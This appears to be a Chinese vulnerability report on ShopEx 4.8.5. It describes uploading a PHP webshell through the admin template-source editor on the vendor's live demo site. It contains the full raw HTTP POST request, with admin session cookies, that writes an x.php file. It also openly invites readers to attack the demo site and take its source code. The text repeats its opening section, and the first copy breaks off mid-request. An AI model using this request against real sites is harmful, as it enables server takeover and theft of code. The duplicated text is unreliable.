### 简要描述: shopex官方演示站,目前来讲,安全性还是非常好的,现在了上传的文件内容,如果含有<?等就会自动转到主页去,所以我之前所利用的方法,抓包改文件名为:t.php,对官方演示已经失效了【其他非官方的,仍然有效】,原因是官网的演示站对PHP内容进行了监控,即便生成php文件,也是过滤了内容的,不能运行!不过我今晚发现过滤也是片面的,也存在一点瑕疵,我成功上传了木马,发现演示站使用的程序,竟然是未加密的,看来官方对自己的技术还是非常自信的!演示站地址:http://demo.shopex.com.cn/,各位喜欢的,可以去突破下,有开源的shopex等着你拿! 这个漏洞的Pank顶多在10,但是泄漏了Shopex源码,所以我个人认为从厂家的严重后果来说,Pank 20 不为过! ### 详细说明: 由于时间关系,不做多说,等我从上海回来后,再做详细的说明,这个是我今天晚上发现的哦! 之前的shopex 4.8.5 后台上传木马的方法很简单: 图示: [<img src="https://images.seebug.org/upload/201204/172356314e86583abd207dec0f684117a38fb8b4.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201204/172356314e86583abd207dec0f684117a38fb8b4.jpg) 这只是之前用的一个方法。 这次拿演示站的方法和上面完全不同! 形成原因,主要是技术人员编程习惯造成!官方可以仔细检查下模板上传代码,也许就会发现问题。 ### 漏洞证明: ``` POST /485/shopadmin/index.php?ctl=system/tmpimage&act=saveSource&_ajax=true&_ss=site HTTP/1.1 x-requested-with: XMLHttpRequest Accept-Language: zh-cn Referer:...
### 简要描述: shopex官方演示站,目前来讲,安全性还是非常好的,现在了上传的文件内容,如果含有<?等就会自动转到主页去,所以我之前所利用的方法,抓包改文件名为:t.php,对官方演示已经失效了【其他非官方的,仍然有效】,原因是官网的演示站对PHP内容进行了监控,即便生成php文件,也是过滤了内容的,不能运行!不过我今晚发现过滤也是片面的,也存在一点瑕疵,我成功上传了木马,发现演示站使用的程序,竟然是未加密的,看来官方对自己的技术还是非常自信的!演示站地址:http://demo.shopex.com.cn/,各位喜欢的,可以去突破下,有开源的shopex等着你拿! 这个漏洞的Pank顶多在10,但是泄漏了Shopex源码,所以我个人认为从厂家的严重后果来说,Pank 20 不为过! ### 详细说明: 由于时间关系,不做多说,等我从上海回来后,再做详细的说明,这个是我今天晚上发现的哦! 之前的shopex 4.8.5 后台上传木马的方法很简单: 图示: [<img src="https://images.seebug.org/upload/201204/172356314e86583abd207dec0f684117a38fb8b4.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201204/172356314e86583abd207dec0f684117a38fb8b4.jpg) 这只是之前用的一个方法。 这次拿演示站的方法和上面完全不同! 形成原因,主要是技术人员编程习惯造成!官方可以仔细检查下模板上传代码,也许就会发现问题。 ### 漏洞证明: ``` POST /485/shopadmin/index.php?ctl=system/tmpimage&act=saveSource&_ajax=true&_ss=site HTTP/1.1 x-requested-with: XMLHttpRequest Accept-Language: zh-cn Referer: http://www.xxxxxxxx.com/shopadmin/index.php#ctl=system/tmpimage&act=detail&p[0]=yyq-info.xml Accept: text/javascript, text/html, application/xml, text/xml, */* Content-Type: application/x-www-form-urlencoded; charset=utf-8 UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E) Host: www.xxxxxxxx.com Content-Length: 1260 Connection: Keep-Alive Cache-Control: no-cache Cookie: SHOPEX_LOGIN_NAME=admin; SHOPEX_SID=0da852eac4999ce82450c9234a6636af; SHOPEX_LG_KEY=ce38449d68a97f5e77985636c900721a; vary=27974dd2b5be612c11922ea4d6487e147a2343a361a328b9bae273711797bc1b; loginpass=f4f068e71e0d87bf0ad51e6214ab84e9 id=yyq-info.xml&tmpid=yyq&name=x.php&file_source=木马内容 ``` 来张演示站截图,程序是源码的哦! [<img src="https://images.seebug.org/upload/201204/17234758429f7baab3ee0a111211d77c917b8a34.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201204/17234758429f7baab3ee0a111211d77c917b8a34.jpg) 再来张: [<img src="https://images.seebug.org/upload/201204/172346412372c6cc0a4f8bb8d380f6afedcf79ea.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201204/172346412372c6cc0a4f8bb8d380f6afedcf79ea.jpg)